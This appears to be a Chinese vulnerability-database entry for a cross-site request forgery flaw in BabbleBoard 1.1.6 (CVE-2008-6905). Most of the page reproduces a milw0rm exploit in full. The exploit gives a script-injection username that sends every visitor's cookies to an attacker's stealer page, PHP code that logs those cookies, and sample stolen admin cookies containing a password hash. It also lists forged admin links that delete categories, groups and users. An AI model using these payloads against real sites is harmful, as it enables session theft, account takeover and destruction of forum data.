投稿
https://www.exploit-db.com/exploits/7475
https://www.securityfocus.com/bid/84484
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200908-004
babbleboard 跨站请求伪造漏洞
| 漏洞ID | 1117054 | 漏洞类型 | 跨站请求伪造 |
| 发布时间 | 2008-12-15 | 更新时间 | 2009-08-06 |
 CVE编号
|
CVE-2008-6905 |  CNNVD-ID
|
CNNVD-200908-004 |
| 漏洞平台 | PHP | CVSS评分 | 6.0 |
|漏洞来源
|漏洞详情
BabbleBoard1.1.6版本中的index.php中的跨站请求伪造漏洞,允许远程认证用户借助管理员页,劫持管理员身份认证的请求。该请求可以删除(1)categories或(2)groups;禁止(3)users;删除(4)users。
|漏洞EXP
############################################################################################
[+] BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF
[+] Discovered By SirGod
[+] Greetz : All my friends
############################################################################################
[+] Cookie Grabber Exploit
- Steal the cookie of any visitor.
1.Register as :
<script>document.location
="http://[yourdomain]/[path]/stealer.php?cookie=" +
document.cookie;</script>
Everyone who visit the index page will be redirected on your cookie
grabber. (because you will be the Latest Member)
Be sure that you use " and not ' because is forbbiden to use that char
is your username.
2 . In stealer.php use the following code (simple cookie grabber)
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
Make sure that you have in the stealer.php directory a file log.txt .
For stealed cookies check log.txt .
3 . You will grab every visitor cookie .
Example (cookie) of a not logged in user :
PHPSESSID=gtolfce6jppb4oasfm81efrqf6
Example (cookie) of a logged in user (admin) :
bb_name=admin; bb_password=d73ed8a01f624fcb878296bc7ff302bc;
PHPSESSID=gtolfce6jppb4oasfm81efrqf6
Username is bb_name.Password is bb_password and is hashed as md5.
[+] Cross Site Request Forgery
If a logged in user with administrative permissions click one of the
following links the specified action will be executed.
- Delete category
http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=[CatID]
http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=5
- Delete group
http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=[GroupID]
http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=2
- Ban User
http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=[UserID]
http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=4
- Delete User
http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=[UserID]
http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=4
############################################################################################
# milw0rm.com [2008-12-15]|受影响的产品
BabbleBoard BabbleBoard 1.1.6
|参考资料
来源:XF
名称:babbleboard-index-csrf(47396)
链接:http://xforce.iss.net/xforce/xfdb/47396
来源:MILW0RM
名称:7475
链接:http://www.milw0rm.com/exploits/7475
来源:SECUNIA
名称:33174
链接:http://secunia.com/advisories/33174
来源:OSVDB
名称:50721
链接:http://osvdb.org/50721
检索漏洞
开始时间
结束时间